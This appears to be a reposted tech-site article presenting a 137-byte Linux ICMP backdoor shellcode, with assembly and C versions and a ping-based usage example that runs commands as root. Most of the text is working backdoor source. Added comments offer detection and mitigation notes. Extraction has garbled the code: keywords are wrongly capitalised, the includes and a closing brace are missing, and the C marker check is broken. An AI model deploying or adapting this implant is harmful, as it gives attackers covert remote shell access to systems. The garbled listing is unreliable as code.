Article title: ICMP backdoor code. (Linux is a technology channel of the IT Lab in China, covering desktop applications, Linux system management, kernel research, embedded systems, and open source.)
Backdoors exist for many protocols; one example is the Linux ICMP backdoor introduced here. Below is a detailed look at this 137-byte remote ICMP backdoor for Linux, which is controlled with the ping program:
/*
X86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org
[Example]
Main:/home/gloomy/security/shellcode/linux/icmp #./icmp
Size of shellcode = 137
Main:/home/gloomy/security/shellcode/linux/icmp # ping-p 992f7573722f62696e2f69643e6f7574-c 1-s 26 localhost
PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\ x99/usr/bin/id> out)
34 bytes from 127.0.0.1: icmp_seq = 0 ttl = 64 time = 0.5 MS
Main:/home/gloomy/security/shellcode/linux/icmp # cat out
Uid = 0 (root) gid = 0 (root) groups = 0 (root)
Main:/home/gloomy/security/shellcode/linux/icmp #
*/
/* Header block as printed on the page: the four #include targets were lost
   during extraction and nothing else on the page names them, so they are not
   reconstructed here. (Capitalised keywords/mnemonics throughout the listing
   are likewise extraction artefacts; the code is reproduced as printed.) */
# Include
# Include
# Include
# Include
/* Marker byte. c_code() below compares byte 36 of every received datagram
   with it and only a match reaches the fork/execve path; a datagram without
   it is silently dropped. For a defender this byte, followed by printable
   shell text, is the wire-level signature of the implant. */
# Define SECRET_CHAR "\ x99"
/* The same program as asm_code()/c_code() below, as a raw x86 Linux
   shellcode byte string (137 bytes per the header comment; the spaces after
   each backslash are extraction artefacts). main() below jumps into it.
   Treat the string as an indicator: it is a fixed byte sequence a static
   scanner can match, and a process executing it must be able to open a raw
   ICMP socket (CAP_NET_RAW / root — note the uid=0 in the example output). */
Char shell [] =
"\ X31 \ xc0 \ x31 \ xdb \ x31 \ xc9 \ xb0 \ x66"
"\ X43 \ x41 \ x51 \ xb1 \ x03 \ x51 \ x49 \ x51"
"\ X89 \ xe1 \ xcd \ x80 \ x89 \ xc2 \ xb0 \ x02"
"\ Xcd \ x80 \ x31 \ xdb \ x39 \ xc3 \ x75 \ x55"
"\ X31 \ xc0 \ x31 \ xdb \ xb0 \ x10 \ x50 \ xb0"
"\ Xff \ x54 \ x54 \ x53 \ x50 \ x55 \ x52 \ x89"
"\ Xe1 \ xb0 \ x66 \ xb3 \ x0c \ xcd \ x80 \ x89"
"\ Xe9 \ x01 \ xc1 \ x31 \ xc0 \ x88 \ x41 \ xfe"
"\ Xb0 \ x25 \ x01 \ xc5 \ xb0" SECRET_CHAR
"\ X32 \ x45 \ xff \ x75 \ xd5 \ xb0 \ x02 \ xcd"
"\ X80 \ x31 \ xdb \ x39 \ xc3 \ x74 \ x25 \ xeb"
"\ Xc9 \ x31 \ xc0 \ x31 \ xdb \ xb3 \ x02 \ xb0"
"\ X06 \ xcd \ x80 \ x5b \ x89 \ xd9 \ x88 \ x43"
"\ X07 \ x80 \ xc1 \ x08 \ x50 \ x55 \ x51 \ x53"
"\ X89 \ xe1 \ x99 \ xb0 \ x0b \ xcd \ x80 \ x31"
"\ Xc0 \ x40 \ xcd \ x80 \ xe8 \ xd8 \ xff"
"\ Xff"
"/Bin/sh-c ";
/* Readable rendition of the shellcode above as inline assembly (AT&T syntax,
   Linux x86 int 0x80 ABI). It is not called by main(); it exists so the byte
   string can be checked against source. Syscall numbers used: 0x66 socketcall
   (sub-op 1 = socket, 0xc = recvfrom), 0x2 fork, 0x6 close, 0xb execve,
   0x1 exit. Detection angle: a socket(AF_INET, SOCK_RAW, IPPROTO_ICMP) opened
   by something that is not a ping utility, followed by a fork whose child
   execs /bin/sh -c; both syscalls are auditable with the kernel audit
   subsystem. */
Void asm_code (){
_ Asm ("
Xorl % eax, % eax
Xorl % ebx, % ebx
Xorl % ecx, % ecx
Movb $0x66, % al
Incl % ebx
Incl % ecx
Push % ecx
Movb $0x3, % cl
Push % ecx
Decl % ecx
Push % ecx
Movl % esp, % ecx
Int $0x80/* socket ();*//* args pushed: protocol 1 (ICMP), type 3 (SOCK_RAW), domain 2 (AF_INET); %ebx=1 selects socket() */
Movl % eax, % edx/* raw socket fd kept in %edx for the receive loop */
Movb $0x2, % al
Int $0x80/* fork ();*/
Xorl % ebx, % ebx
Cmpl % eax, % ebx
Jne exit/* parent exits; the child carries on in the background */
Endlessloop:
Xorl % eax, % eax
Xorl % ebx, % ebx
Movb $0x10, % al
Push % eax
Movb $ 0xff, % al
Push % esp
Push % esp
Push % ebx
Push % eax
Push % ebp
Push % edx
Movl % esp, % ecx
Movb $0x66, % al
Movb $ 0x0c, % bl
Int $0x80/* recvfrom ();*//* recvfrom(fd, %ebp, 0xff, 0, from, &fromlen); %ebp is never set here, presumably the caller's frame serves as the buffer — confirm */
Movl % ebp, % ecx
Addl % eax, % ecx
Xorl % eax, % eax
Movb % al,-2 (% ecx)/* NUL-terminate the received bytes */
Movb $0x25, % al
Addl % eax, % ebp/* %ebp now points 37 bytes into the datagram (the command text) */
Movb $0x99, % al/* SECRET_CHAR */
Xorb-1 (% ebp), % al/* compare byte 36 with the marker */
Jnz endlessloop/* no marker: wait for the next datagram */
Movb $0x2, % al
Int $0x80/* fork ();*/
Xorl % ebx, % ebx
Cmpl % eax, % ebx
Je stack/* child runs the command; parent goes back to the loop */
Jmp endlessloop
Execve:
Xorl % eax, % eax
Xorl % ebx, % ebx
Movb $0x2, % bl
Movb $0x6, % al
Int $0x80/* close ();*//* close(2): the child gives up stderr before exec */
Pop % ebx/* address of the "/bin/sh -c" string pushed by the call below */
Movl % ebx, % ecx
Movb % al, 0x7 (% ebx)/* %al is close()'s return (0 on success): writes the NUL splitting "/bin/sh" from "-c" */
Addb $0x8, % cl/* %ecx -> "-c" */
Push % eax
Push % ebp
Push % ecx
Push % ebx
Movl % esp, % ecx/* argv = {"/bin/sh", "-c", command, NULL} */
Cdq/* %edx = 0: envp = NULL */
Movb $ 0xb, % al
Int $0x80/* execve ();*/
Exit:
Xorl % eax, % eax
Incl % eax
Int $0x80/* exit ();*/
Stack:
Call execve/* pushes the address of the string below as its return address */
. String \ "/bin/sh-c \"
");
}
/* C rendition of the same logic: open a raw ICMP socket, put the process in
   the background, and for every datagram whose byte 36 equals SECRET_CHAR run
   the text that follows it with /bin/sh -c. With an option-less IPv4 header
   (20 bytes) plus the 8-byte ICMP header, byte 36 is 8 bytes into the ICMP
   payload — the offset a network sensor would inspect for the marker.
   Mitigations: drop or rate-limit inbound echo requests at the host firewall,
   alert on raw-socket opens by unexpected binaries, and alert on /bin/sh
   spawned by a process that holds a raw socket. Not called by main(). */
Void c_code (){
Int fd;
Int nb = 0;
Struct sockaddr_in them;
Int them_size = sizeof (struct sockaddr );
Char buf [256];
Char * prog [] = {"/bin/sh", "-c", & buf [37], NULL }; /* argv: command text starts at byte 37 of the raw datagram */
Fd = socket (2, 3, 1 ); /* AF_INET, SOCK_RAW, IPPROTO_ICMP: requires CAP_NET_RAW */
If (fork ()> 0) exit (0 ); /* parent exits; the child keeps running */
While (1 ){
While (! (Nb = recvfrom (fd, buf, 255, 0, (struct sockaddr *) & them, & them_size ))); /* block until a datagram arrives */
Buf [nb-1] = 0; /* terminate the received bytes so sh sees a C string */
If (buf [36] = (char) SECRET_CHAR) /* marker check on byte 36 */
If (fork () = 0) {close (2); execve (prog [0], prog, NULL );} /* child: stderr closed, then exec */
}
}
/* Entry point: reports the shellcode length on stderr (strlen stops at the
   first NUL byte, which is why the string avoids them) and then jumps into
   the byte string as code. The closing brace of main() is missing on this
   page. Running it requires an executable data segment and raw-socket
   privilege, both of which are themselves signals worth auditing. */
Int main (int c, char * v []) {
Void (* I )(); /* function pointer aimed at the shellcode bytes */
I = (void (*) () shell;
Fprintf (stderr, "Size of shellcode = % d \ n", strlen (shell ));
I (); /* control never returns here while the implant loop runs */
Return 0;
This concludes the walkthrough of the Linux ICMP backdoor code.